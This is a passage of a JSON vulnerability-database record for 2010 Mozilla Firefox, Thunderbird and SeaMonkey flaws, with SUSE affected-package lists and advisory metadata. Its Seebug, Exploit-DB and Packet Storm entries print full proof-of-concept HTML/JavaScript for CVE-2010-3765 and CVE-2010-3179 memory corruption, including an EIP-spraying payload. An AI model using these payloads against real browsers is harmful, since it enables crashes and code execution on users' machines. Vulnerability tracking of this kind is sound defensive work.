"OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "libfreebl3-3.12.8-1.1.1.ppc.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}], "description": "Various Mozilla suite components, including Firefox, were updated to fix various bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2010-11-08T11:27:17", "title": "remote code execution in MozillaFirefox,seamonkey,MozillaThunderbird", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2762", "CVE-2010-2766", "CVE-2010-3131", "CVE-2010-2770", "CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3169", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-2763", "CVE-2010-3167", "CVE-2010-3180", "CVE-2010-2753", "CVE-2010-3168", "CVE-2010-2764", "CVE-2010-3166", "CVE-2010-2769", "CVE-2010-3179", "CVE-2010-2768", "CVE-2010-2765", "CVE-2010-2767", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183", "CVE-2010-2760"], "modified": "2010-11-08T11:27:17", "id": "SUSE-SA:2010:056", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00003.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:07:22", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2010-10-29T00:00:00", "type": "seebug", "title": "Firefox Memory Corruption Proof of Concept (Simplified)", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3765"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-10-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20209", "id": "SSV:20209", "sourceData": "\n Hi there,\r\n \r\nFor those who still do not know .. The proof of concept (that I have\r\nextracted) for CVE-2010-3765 is the following:\r\n \r\n<html><body>\r\n<script>\r\n \r\n function G(str){\r\n var cobj=document.createElement(str);\r\n document.body.appendChild(cobj);\r\n cobj.scrollWidth;\r\n }\r\n \r\n function crashme() {\r\n document.write("fooFOO");\r\n G("a");\r\n document.write("<a lang></a>a");\r\n G("base");\r\n document.write("barBAR");\r\n G("audio");\r\n }\r\n</script>\r\n<script>crashme();</script>\r\n</body>\r\n</html>\r\n \r\nFor more details:\r\nhttp://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html\r\n-- \r\nhttp://extraexploit.blogspot.com\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20209", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "poc"}], "exploitdb": [{"lastseen": "2016-02-04T00:08:05", "osvdbidlist": ["68850"], "references": [], "description": "Mozilla Firefox SeaMonkey 3.6.10 and Thunderbird 3.1.4 'document.write' Memory Corruption Vulnerability. CVE-2010-3179. Remote exploit for linux platform", "edition": 1, "reporter": "Alexander Miller", "published": "2010-10-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "exploitdb", "title": "Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3179"], "modified": "2010-10-19T00:00:00", "id": "EDB-ID:34881", "href": "https://www.exploit-db.com/exploits/34881/", "sourceData": "source: http://www.securityfocus.com/bid/44247/info\r\n\r\nMozilla Firefox, Thunderbird, and Seamonkey are prone to a memory-corruption vulnerability because they fail to adequately validate user-supplied data.\r\n\r\nSuccessful exploits may allow an attacker to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\nThis issue affects versions prior to:\r\n\r\nFirefox 3.6.11\r\nFirefox 3.5.14\r\nThunderbird 3.1.5\r\nThunderbird 3.0.9\r\nSeaMonkey 2.0.9\r\n\r\nNOTE: This issue was previously discussed in 44228 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-64/65/66/67/68/69/71/72 Multiple Vulnerabilities) but has been given its own record to better document it. \r\n\r\n<html>\r\n<head>\r\n<script language=\"JavaScript\" type=\"Text/Javascript\">\r\n var eip = unescape(\"%u4141%u4141\");\r\n var string2 = unescape(\"%u0000%u0000\");\r\n var finalstring2 = expand(string2, 49000000);\r\n var finaleip = expand(eip, 21000001);\r\ndocument.write(finalstring2);\r\ndocument.write(finaleip);\r\nfunction expand(string, number) {\r\n var i = Math.ceil(Math.log(number) / Math.LN2),\r\n result = string;\r\n do {\r\n result += result;\r\n } while (0 < --i);\r\n return result.slice(0, string.length * number);\r\n}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n<html><body></body></html>\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34881/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:14", "references": [], "description": "", "edition": 1, "reporter": "Packet Storm", "published": "2010-10-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "Firefox Memory Corruption", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-29T00:00:00", "id": "PACKETSTORM:95278", "href": "https://packetstormsecurity.com/files/95278/Firefox-Memory-Corruption.html", "sourceData": "`For those who still do not know .. The proof of concept (that I have \nextracted) for CVE-2010-3765 is the following: \n \n<html><body> \n<script> \n \nfunction G(str){ \nvar cobj=document.createElement(str); \ndocument.body.appendChild(cobj); \ncobj.scrollWidth; \n} \n \nfunction crashme() { \ndocument.write(\"fooFOO\"); \nG(\"a\"); \ndocument.write(\"<a lang></a>a\"); \nG(\"base\"); \ndocument.write(\"barBAR\"); \nG(\"audio\"); \n} \n</script> \n<script>crashme();</script> \n</body> \n</html> \n \nFor more details: \nhttp://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/95278/firefox-memcorrupt.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
